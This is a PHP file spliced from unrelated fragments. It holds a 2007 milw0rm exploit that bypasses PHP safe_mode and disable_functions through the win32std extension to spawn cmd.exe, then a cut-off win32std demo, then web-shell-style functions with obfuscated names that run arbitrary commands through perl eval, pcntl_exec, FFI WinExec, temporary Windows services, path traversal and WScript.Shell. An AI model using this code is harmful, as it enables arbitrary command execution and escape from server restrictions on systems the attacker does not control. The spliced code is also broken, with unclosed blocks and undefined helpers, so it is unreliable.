<?php
//PHP 5.2.3 win32std extension safe_mode and disable_functions protections bypass
//author: shinnai
//mail: shinnai[at]autistici[dot]org
//site: http://shinnai.altervista.org
//Tested on xp Pro sp2 full patched, worked both from the cli and on apache
//Thanks to rgod for all his precious advises :)
//I set php.ini in this way:
//safe_mode = On
//disable_functions = system
//if you launch the exploit from the cli, cmd.exe will be wxecuted
//if you browse it through apache, you'll see a new cmd.exe process activated in taskmanager
if (!extension_loaded("win32std")) {
die("win32std extension required!");
}
system("cmd.exe");
//just to be sure that protections work well
win_shell_execute("..\\..\\..\\..\\windows\\system32\\cmd.exe");
?>
# milw0rm.com [2007-07-24]
function err($txt)
{
echo "ERROR: " . $txt . "\n";
exit;
}
/* Message box exemple */
if (win_message_box("Hey !\n\nThis is win32std extension test\n\nAre you realy sure you want to start it ?", MB_YESNO | MB_ICONQUESTION | MB_DEFBUTTON2) != MB_IDYES) {
return FALSE;
}
/* Browse exemple */
$filter = array("HTML File" => "*.htm;*.html", "INI File" => "*.ini", "All file" => "*.*");
echo win_browse_file(1, NULL, 'a_file', 'ext', $filter) . "\n";
echo win_browse_folder(NULL, "Choose a dir") . "\n";
/* Shell execute exemple */
win_shell_execute('c:\\', "find");
/* beep exemple */
if (!win_beep('*')) {
echo "Unable to beep !\n";
} else {
echo "Bip !\n";
}
/* Sound exemple */
if (!win_play_wav("%WINDIR%\\Media\ringin.wav", 1)) {
echo "Unable to play sound !\n";
} else {
echo "Playing sound !\n";
sleep(1);
if (!win_play_wav(NULL)) {
echo "Unable to stop playing sound !\n";
} else {
function winshelL($command)
{
$name = whereistmP() . "\\" . uniqid('NJ');
win_shell_execute('cmd.exe', '', "/C {$command} >\"{$name}\"");
sleep(1);
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
function z6v($c)
{
global $win, $tempdir;
$r = '';
if (!empty($c)) {
if (!$win) {
if (extension_loaded('perl')) {
@ob_start();
$p = new perl();
$p->eval("system('{$c}')");
$r = @ob_get_contents();
@ob_end_clean();
} elseif (z7r('pcntl_exec') && z7r('pcntl_fork')) {
$r = '[~] Blind Command Execution via [pcntl_exec]\\n\\n';
$o = $tempdir . uniqid('pcntl');
$pid = @pcntl_fork();
if ($pid == -1) {
$r .= '[-] Could not fork. Exit';
} elseif ($pid) {
$r .= @pcntl_wifexited($status) ? '[+] Done! Command "' . $c . '" successfully executed.' : '[-] Error. Incorrect Command.';
} else {
$c = array(" -e 'system(\"{$c} > {$o}\")'");
if (@pcntl_exec('/usr/bin/perl', $c)) {
exit(0);
}
if (@pcntl_exec('/usr/local/bin/perl', $c)) {
exit(0);
}
die;
}
$r = z9p($o);
@unlink($o);
}
} else {
$o = $tempdir . uniqid('NJ');
if (extension_loaded('ffi')) {
$a = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$r = $a->WinExec("cmd.exe /c " . z6l($c) . " >\"{$o}\"", 0);
while (!@file_exists($o)) {
sleep(1);
}
$r = z9p($o);
} elseif (extension_loaded('win32service')) {
$s = uniqid('NJ');
@win32_create_service(array('service' => $s, 'display' => $s, 'path' => 'c:\\windows\\system32\\cmd.exe', 'params' => "/c " . z6l($c) . " >\"{$o}\""));
@win32_start_service($s);
@win32_stop_service($s);
@win32_delete_service($s);
while (!@file_exists($o)) {
sleep(1);
}
$r = z9p($o);
} elseif (extension_loaded("win32std")) {
@win_shell_execute('..\\..\\..\\..\\..\\..\\..\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"');
while (!@file_exists($o)) {
sleep(1);
}
$r = z9p($o);
} else {
$a = new COM("WScript.Shell");
$a->Run('c:\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"');
$r = z9p($o);
}
@unlink($o);
}
}
return $r;
}